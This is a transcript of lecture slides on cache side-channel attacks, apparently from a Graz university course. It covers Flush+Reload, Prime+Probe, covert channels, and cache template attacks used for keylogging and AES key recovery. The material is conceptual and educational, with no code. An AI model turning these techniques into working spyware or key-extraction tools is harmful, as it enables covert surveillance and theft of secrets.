Side-Channel Security - Chapter 2: Cache Template Attacks

191
Side-Channel Security Chapter 2: Cache Template Attacks Daniel Gruss March 9, 2021 Graz University of Technology

Transcript of Side-Channel Security - Chapter 2: Cache Template Attacks

Page 1: Side-Channel Security - Chapter 2: Cache Template Attacks

Side-Channel Security

Chapter 2: Cache Template Attacks

Daniel Gruss

March 9, 2021

Graz University of Technology

Page 2: Side-Channel Security - Chapter 2: Cache Template Attacks

TLB and Paging

� Paging: memory translated page-wise from virtual to physical

� TLB (translation lookaside buffer) caches virtual to physical mapping

� TLB has some latency

� Worst case for Cache: mapping not in TLB, need to load mapping from

RAM

� Solution: Use virtual addresses instead of physical addresses

Page 3: Side-Channel Security - Chapter 2: Cache Template Attacks

TLB and Paging

� Paging: memory translated page-wise from virtual to physical

� TLB (translation lookaside buffer) caches virtual to physical mapping

� TLB has some latency

� Worst case for Cache: mapping not in TLB, need to load mapping from

RAM

� Solution: Use virtual addresses instead of physical addresses

Page 4: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache indexing methods

� VIVT: Virtually indexed, virtually tagged

� PIPT: Physically indexed, physically tagged

� PIVT: Physically indexed, virtually tagged

� VIPT: Virtually indexed, physically tagged

Page 5: Side-Channel Security - Chapter 2: Cache Template Attacks

VIVT

Virtual Address Cache

Tag Datab bitsn bits

Cache Index

VPN

f 2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Fast

� Virtual Tag is not unique (Context switches)

� Shared memory more than once in cache

Page 6: Side-Channel Security - Chapter 2: Cache Template Attacks

VIVT

Virtual Address Cache

Tag Datab bitsn bits

Cache Index

VPN

f 2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Fast

� Virtual Tag is not unique (Context switches)

� Shared memory more than once in cache

Page 7: Side-Channel Security - Chapter 2: Cache Template Attacks

PIPT

Virtual Address Cache

Tag Datab bitsn bits

Cache Index

TLB

b bitsn bits

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Slow (TLB lookup for index)

� Shared memory only once in cache!

Page 8: Side-Channel Security - Chapter 2: Cache Template Attacks

PIPT

Virtual Address Cache

Tag Datab bitsn bits

Cache Index

TLB

b bitsn bits

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Slow (TLB lookup for index)

� Shared memory only once in cache!

Page 9: Side-Channel Security - Chapter 2: Cache Template Attacks

(PIVT)

Virtual Address Cache

Tag Datab bitsn bits

Cache Index

TLB

b bitsn bits

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Slow (TLB lookup for index)

� Virtual Tag is not unique (Context switches)

� Shared memory more than once in cache

Page 10: Side-Channel Security - Chapter 2: Cache Template Attacks

(PIVT)

Virtual Address Cache

Tag Datab bitsn bits

Cache Index

TLB

b bitsn bits

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Slow (TLB lookup for index)

� Virtual Tag is not unique (Context switches)

� Shared memory more than once in cache

Page 11: Side-Channel Security - Chapter 2: Cache Template Attacks

VIPT

Virtual Address Cache

Tag Datab bitsn bitsVPN

Cache Index

TLB

PPN

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Fast

� 4 KiB pages: last 12 bits of VA and PA are equal

� Using more bits is unpractical (like VIVT)

→ Cache size ≤ # ways · page size

Page 12: Side-Channel Security - Chapter 2: Cache Template Attacks

VIPT

Virtual Address Cache

Tag Datab bitsn bitsVPN

Cache Index

TLB

PPN

f

2n cache sets

Way 2 Tag Way 2 DataWay 1 Tag Way 1 Data

=?

=?Tag

Data

� Fast

� 4 KiB pages: last 12 bits of VA and PA are equal

� Using more bits is unpractical (like VIVT)

→ Cache size ≤ # ways · page size

Page 13: Side-Channel Security - Chapter 2: Cache Template Attacks

Remarks

� L1 caches: VIVT or VIPT

� L2/L3 caches: PIPT

Page 14: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Attackeraddress space Cache

Victimaddress space

step 0: attacker maps shared library→ shared memory, shared in cache

Page 15: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Attackeraddress space Cache

Victimaddress space

step 0: attacker maps shared library→ shared memory, shared in cache

cached cached

Page 16: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Attackeraddress space Cache

Victimaddress space

step 0: attacker maps shared library→ shared memory, shared in cache

step 1: attacker flushes the shared line

flushes

Page 17: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Attackeraddress space Cache

Victimaddress space

step 0: attacker maps shared library→ shared memory, shared in cache

step 1: attacker flushes the shared line

step 2: victim loads data while performing encryption

loads data

Page 18: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Attackeraddress space Cache

Victimaddress space

step 0: attacker maps shared library→ shared memory, shared in cache

step 1: attacker flushes the shared line

step 2: victim loads data while performing encryption

step 3: attacker reloads data→ fast access if the victim loaded the line

reloads data

Page 19: Side-Channel Security - Chapter 2: Cache Template Attacks

Flush+Reload

Pros: fine granularity (1 line)

Cons: restrictive

1. needs clflush instruction (not available e.g., in JS)

2. needs shared memory

Page 20: Side-Channel Security - Chapter 2: Cache Template Attacks

Variants of Flush+Reload

� Flush+Flush [1]

� Evict+Reload [2] on ARM [4]

Page 21: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

Page 22: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

Page 23: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

Page 24: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

loads data

Page 25: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

loads data

Page 26: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

loads data

Page 27: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

loads data

Page 28: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

Page 29: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

step 2: attacker probes data to determine if the set was accessed

Page 30: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

step 2: attacker probes data to determine if the set was accessed

fastaccess

Page 31: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Attackeraddress space Cache

Victimaddress space

step 0: attacker fills the cache (prime)

step 1: victim evicts cache lines while performing encryption

step 2: attacker probes data to determine if the set was accessed

slowaccess

Page 32: Side-Channel Security - Chapter 2: Cache Template Attacks

Prime+Probe

Pros: less restrictive

1. no need for clflush instruction (not available e.g., in JS)

2. no need for shared memory

Cons: coarser granularity (1 set)

Page 33: Side-Channel Security - Chapter 2: Cache Template Attacks

Issues with Prime+Probe

We need to evict caches lines without clflush or shared memory:

1. which addresses do we access to have congruent cache lines?

2. without any privilege?

3. and in which order do we access them?

Page 34: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.1: Which physical addresses to access?

“LRU eviction”:

� assume that cache uses LRU replacement

� accessing n addresses from the same cache set to evict an n-way set

� eviction from last level → from whole hierarchy (it’s inclusive!)

Page 35: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.2: Which addresses map to the same set?

slice 0 slice 1 slice 2 slice 3

H

2

offsetsettagphysical address

30

061735

11

line

� function H that maps slices is

undocumented

� reverse-engineered by [3, 6, 8]

� hash function basically an XOR

of address bits

Page 36: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.2: Which addresses map to the same set?

slice 0 slice 1 slice 2 slice 3

H

2

offsetsettagphysical address

30

061735

11

line

� function H that maps slices is

undocumented

� reverse-engineered by [3, 6, 8]

� hash function basically an XOR

of address bits

Page 37: Side-Channel Security - Chapter 2: Cache Template Attacks

#1.2: Which addresses map to the same set?

3 functions, depending on the number of cores

Address bit

3 3 3 3 3 3 3 3 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 0 0 0 0

7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6

2 cores o0 ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕

4 coreso0 ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕o1 ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕

8 cores

o0 ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕o1 ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕o2 ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕ ⊕

Page 38: Side-Channel Security - Chapter 2: Cache Template Attacks

#2: Obtain information without root privileges

� last-level cache is physically indexed

� root privileges needed for physical addresses

� use 2 MB pages → lowest 21 bits are the same as virtual address

→ enough to compute the cache set

Page 39: Side-Channel Security - Chapter 2: Cache Template Attacks

#2: Obtain information without root privileges

� last-level cache is physically indexed

� root privileges needed for physical addresses

� use 2 MB pages → lowest 21 bits are the same as virtual address

→ enough to compute the cache set

Page 40: Side-Channel Security - Chapter 2: Cache Template Attacks

#2: Obtain information without root privileges

� last-level cache is physically indexed

� root privileges needed for physical addresses

� use 2 MB pages → lowest 21 bits are the same as virtual address

→ enough to compute the cache set

Page 41: Side-Channel Security - Chapter 2: Cache Template Attacks

#2: Obtain information without root privileges

� last-level cache is physically indexed

� root privileges needed for physical addresses

� use 2 MB pages → lowest 21 bits are the same as virtual address

→ enough to compute the cache set

Page 42: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 43: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 44: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 45: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4

load

9

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 46: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 49

load

10

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 47: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910

load

11

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 48: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 11

load

12

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 49: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 11 12

load

13

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 50: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 11 1213

load

14

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 51: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 11 1213 14

load

15

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 52: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.1: Replacement policy on older CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 11 1213 1415

load

16

� LRU replacement policy: oldest entry first

� timestamps for every cache line

� access updates timestamp

Page 53: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 54: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4

load

9

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 55: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 49

load

10

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 56: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910

load

11

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 57: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 11

load

12

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 58: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 1112

load

13

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 59: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 1112 13

load

14

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 60: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 1112 1314

load

15

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 61: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 1112 1314 15

load

16

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 62: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 1112 1314 1516

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 63: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.2: Replacement policy on recent CPUs

“LRU eviction” memory accesses

cache set 2 5 8 1 7 6 3 4910 1112 1314 1516

� no LRU replacement

� only 75% success rate on Haswell

� more accesses → higher success rate, but too slow

Page 64: Side-Channel Security - Chapter 2: Cache Template Attacks

#3.3: Cache eviction strategyA

ddre

ss

a1

a2

a3

a4

a5

a6

a7

a8

a9

Time

Figure 1: Fast and effective on Haswell. Eviction rate >99.97%.

Page 65: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache covert channels

Page 66: Side-Channel Security - Chapter 2: Cache Template Attacks

Side channels vs covert channels

� side channel: attacker spies a victim process

� covert channel: communication between two processes

� that are not supposed to communicate

� that are collaborating

Page 67: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit cache covert channels

ideas for 1-bit channels:

� Prime+Probe: use one cache set to transmit

0: sender does not access the set → low access time in receiver

1: sender does access the set → high access time in receiver

� Flush+Reload/Flush+Flush/Evict+Reload: use one address to transmit

0: sender does not access the address → high access time in receiver

1: sender does access the address → low access time in receiver

Page 68: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit cache covert channels

ideas for 1-bit channels:

� Prime+Probe: use one cache set to transmit

0: sender does not access the set → low access time in receiver

1: sender does access the set → high access time in receiver

� Flush+Reload/Flush+Flush/Evict+Reload: use one address to transmit

0: sender does not access the address → high access time in receiver

1: sender does access the address → low access time in receiver

Page 69: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit cache covert channels

ideas for 1-bit channels:

� Prime+Probe: use one cache set to transmit

0: sender does not access the set → low access time in receiver

1: sender does access the set → high access time in receiver

� Flush+Reload/Flush+Flush/Evict+Reload: use one address to transmit

0: sender does not access the address → high access time in receiver

1: sender does access the address → low access time in receiver

Page 70: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit covert channels

� 1 bit data, 0 bit control?

� idea: divide time into slices (e.g., 50µs frames)

� synchronize sender and receiver with a shared clock

Page 71: Side-Channel Security - Chapter 2: Cache Template Attacks

1-bit covert channels

� 1 bit data, 0 bit control?

� idea: divide time into slices (e.g., 50µs frames)

� synchronize sender and receiver with a shared clock

Page 72: Side-Channel Security - Chapter 2: Cache Template Attacks

Problems of 1-bit covert channels

� errors?

→ error-correcting codes

� retransmission may be more efficient (less overhead)

� desynchronization

� optimal transmission duration may vary

Page 73: Side-Channel Security - Chapter 2: Cache Template Attacks

Problems of 1-bit covert channels

� errors? → error-correcting codes

� retransmission may be more efficient (less overhead)

� desynchronization

� optimal transmission duration may vary

Page 74: Side-Channel Security - Chapter 2: Cache Template Attacks

Multi-bit covert channels

� combine multiple 1-bit channels

� avoid interferences

→ higher performance

� use 1-bit for sending = true/false

Page 75: Side-Channel Security - Chapter 2: Cache Template Attacks

Multi-bit covert channels

� combine multiple 1-bit channels

� avoid interferences

→ higher performance

� use 1-bit for sending = true/false

Page 76: Side-Channel Security - Chapter 2: Cache Template Attacks

Multi-bit covert channels

� combine multiple 1-bit channels

� avoid interferences

→ higher performance

� use 1-bit for sending = true/false

Page 77: Side-Channel Security - Chapter 2: Cache Template Attacks

Packets / frames

Organize data in packets / frames:

� some data bits

� check sum

� sequence number

→ keep sender and receiver synchronous

→ check whether retransmission is necessary

Page 78: Side-Channel Security - Chapter 2: Cache Template Attacks

Efficient retransmission

How can the sender know when to retransmit?

� idea: acknowledge packets (requires a backward channel)

� use some bits as a backward channel

� use the same bits as a backward channel (sender sending bit/receiver

sending bit)

� why wait for retransmission?

→ sender should retransmit until receiver acknowledged

Page 79: Side-Channel Security - Chapter 2: Cache Template Attacks

Efficient retransmission

How can the sender know when to retransmit?

� idea: acknowledge packets (requires a backward channel)

� use some bits as a backward channel

� use the same bits as a backward channel (sender sending bit/receiver

sending bit)

� why wait for retransmission?

→ sender should retransmit until receiver acknowledged

Page 80: Side-Channel Security - Chapter 2: Cache Template Attacks

Efficient retransmission

How can the sender know when to retransmit?

� idea: acknowledge packets (requires a backward channel)

� use some bits as a backward channel

� use the same bits as a backward channel (sender sending bit/receiver

sending bit)

� why wait for retransmission?

→ sender should retransmit until receiver acknowledged

Page 81: Side-Channel Security - Chapter 2: Cache Template Attacks

Efficient retransmission

How can the sender know when to retransmit?

� idea: acknowledge packets (requires a backward channel)

� use some bits as a backward channel

� use the same bits as a backward channel (sender sending bit/receiver

sending bit)

� why wait for retransmission?

→ sender should retransmit until receiver acknowledged

Page 82: Side-Channel Security - Chapter 2: Cache Template Attacks

Raw capacity C

� number of bits per second

� measure over ≥ 1 minute

s bits transmitted in 1 minute:

C =s

60

Page 83: Side-Channel Security - Chapter 2: Cache Template Attacks

Bit error rate p

� count bits that are wrong w

� count total bits sent bs

� count total bits received br

Error rate:

p =w + |br − bs|max (bs, br)

,

or if br = bs:

p =w

br,

Page 84: Side-Channel Security - Chapter 2: Cache Template Attacks

Capacity

True capacity T :

T = C · (1 + ((1− p) · log2 (1− p) + p · log2 (p)))

C is the raw capacity and p is the bit error rate.

Page 85: Side-Channel Security - Chapter 2: Cache Template Attacks

Capacity

0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 10

20

40

60

80

100

Error rate

Tru

eca

paci

ty

Page 86: Side-Channel Security - Chapter 2: Cache Template Attacks

State of the art

method raw capacity err. rate true capacity env.

F+F [1] 3968Kbps 0.840% 3690Kbps native

F+R [1] 2384Kbps 0.005% 2382Kbps native

E+R [4] 1141Kbps 1.100% 1041Kbps native

P+P [7] 601Kbps 0.000% 601Kbps native

P+P [5] 600Kbps 1.000% 552Kbps virt

P+P [7] 362Kbps 0.000% 362Kbps native

Page 87: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache template attacks

Page 88: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

� State of the art: cache attacks are powerful

� Problem: manual identification of attack targets

� Solution: Cache Template Attacks

� Automatically find any secret-dependent cache access

� Can be used for attacks and to improve software

� Examples:

� Cache-based keylogger

� Automatic attacks on crypto algorithms

Page 89: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

� State of the art: cache attacks are powerful

� Problem: manual identification of attack targets

� Solution: Cache Template Attacks

� Automatically find any secret-dependent cache access

� Can be used for attacks and to improve software

� Examples:

� Cache-based keylogger

� Automatic attacks on crypto algorithms

Page 90: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

� State of the art: cache attacks are powerful

� Problem: manual identification of attack targets

� Solution: Cache Template Attacks

� Automatically find any secret-dependent cache access

� Can be used for attacks and to improve software

� Examples:

� Cache-based keylogger

� Automatic attacks on crypto algorithms

Page 91: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

� State of the art: cache attacks are powerful

� Problem: manual identification of attack targets

� Solution: Cache Template Attacks

� Automatically find any secret-dependent cache access

� Can be used for attacks and to improve software

� Examples:

� Cache-based keylogger

� Automatic attacks on crypto algorithms

Page 92: Side-Channel Security - Chapter 2: Cache Template Attacks

Can We Build a Cache-Based Keylogger?

Page 93: Side-Channel Security - Chapter 2: Cache Template Attacks

Can We Build a Cache-Based Keylogger?

Page 94: Side-Channel Security - Chapter 2: Cache Template Attacks

Can We Build a Cache-Based Keylogger?

Page 95: Side-Channel Security - Chapter 2: Cache Template Attacks

Can We Build a Cache-Based Keylogger?

Page 96: Side-Channel Security - Chapter 2: Cache Template Attacks

Can We Build a Cache-Based Keylogger?

Page 97: Side-Channel Security - Chapter 2: Cache Template Attacks

Challenges

� How to locate key-dependent memory accesses?

� It’s complicated:

� Large binaries and libraries (third-party code)

� Many libraries (gedit: 60MB)

� Closed-source / unknown binaries

� Self-compiled binaries

� Difficult to find all exploitable addresses

Page 98: Side-Channel Security - Chapter 2: Cache Template Attacks

Challenges

� How to locate key-dependent memory accesses?

� It’s complicated:

� Large binaries and libraries (third-party code)

� Many libraries (gedit: 60MB)

� Closed-source / unknown binaries

� Self-compiled binaries

� Difficult to find all exploitable addresses

Page 99: Side-Channel Security - Chapter 2: Cache Template Attacks

Challenges

� How to locate key-dependent memory accesses?

� It’s complicated:

� Large binaries and libraries (third-party code)

� Many libraries (gedit: 60MB)

� Closed-source / unknown binaries

� Self-compiled binaries

� Difficult to find all exploitable addresses

Page 100: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

Profiling Phase

� Preprocessing step to find exploitable addresses automatically

� w.r.t. “events” (keystrokes, encryptions, ...)

� called “Cache Template”

Exploitation Phase

� Monitor exploitable addresses

Page 101: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attacks

Profiling Phase

� Preprocessing step to find exploitable addresses automatically

� w.r.t. “events” (keystrokes, encryptions, ...)

� called “Cache Template”

Exploitation Phase

� Monitor exploitable addresses

Page 102: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Cache is empty

Page 103: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

A

Shared 0x0

Shared 0x0

Attacker triggers an event

Shared 0x0

Shared 0x0

Shared 0x0

Page 104: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Attacker checks one address for cache hits (“Reload”)

Shared 0x0

Shared 0x0

Shared 0x0

Page 105: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Update cache hit ratio (per event and address)

Shared 0x0

Shared 0x0

Shared 0x0

Page 106: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Attacker flushes shared memory

Shared 0x0

Shared 0x0

Shared 0x0

flush

Page 107: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Repeat for higher accuracy

A

Page 108: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Repeat for all events

B

Page 109: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Shared 0x0

Shared 0x0

Repeat for all events

C

Page 110: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Continue with next address

A

Shared 0x40

Shared 0x40

Page 111: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase

Attacker address space

Cache

Victim address space

Continue with next address

A

Shared 0x80

Shared 0x80

Page 112: Side-Channel Security - Chapter 2: Cache Template Attacks

Cache Template Attack Demo

Page 113: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: 1 Event, 1 Address

Address

Keyn

0x7c800

Page 114: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: 1 Event, 1 Address

Address

Keyn

0x7c800

Example: Cache Hit Ratio for (0x7c800,n): 200 / 200

Page 115: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, 1 Address

Address

Keyg h i j k l m n o p q r s t u v w x y z

0x7c800

Page 116: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, 1 Address

Address

Keyg h i j k l m n o p q r s t u v w x y z

0x7c800

Example: Cache Hit Ratio for (0x7c800,u): 13 / 200

Page 117: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, 1 Address

Address

Keyg h i j k l m n o p q r s t u v w x y z

0x7c800

Distinguish n from other keys by monitoring 0x7c800

Page 118: Side-Channel Security - Chapter 2: Cache Template Attacks

Profiling Phase: All Events, All Addresses

Address

Keyg h i j k l m n o p q r s t u v w x y z

0x7c6800x7c6c00x7c7000x7c7400x7c7800x7c7c00x7c8000x7c8400x7c8800x7c8c00x7c9000x7c9400x7c9800x7c9c00x7ca000x7cb800x7cc400x7cc800x7ccc00x7cd00

Page 119: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 3: Locate AES T-Tables

AES uses T-Tables (precomputed from S-Boxes)

� 4 T-Tables

T0[k{0,4,8,12} ⊕ p{0,4,8,12}

]T1

[k{1,5,9,13} ⊕ p{1,5,9,13}

]...

� If we know which entry of T is accessed, we know the result of ki ⊕ pi.� Known-plaintext attack (pi is known) → ki can be determined

Page 120: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 3: Locate AES T-Tables

AES T-Table implementation from OpenSSL 1.0.2

� Most addresses in two groups:

� Cache hit ratio 100% (always cache hits)

� Cache hit ratio 0% (no cache hits)

� One 4096 byte memory block:

� Cache hit ratio of 92%

� Cache hits depend on key value and plaintext value

� The T-Tables

Page 121: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 3: Locate AES T-Tables

AES T-Table implementation from OpenSSL 1.0.2

� Most addresses in two groups:

� Cache hit ratio 100% (always cache hits)

� Cache hit ratio 0% (no cache hits)

� One 4096 byte memory block:

� Cache hit ratio of 92%

� Cache hits depend on key value and plaintext value

� The T-Tables

Page 122: Side-Channel Security - Chapter 2: Cache Template Attacks

Attack 3: Locate AES T-Tables

AES T-Table implementation from OpenSSL 1.0.2

� Most addresses in two groups:

� Cache hit ratio 100% (always cache hits)

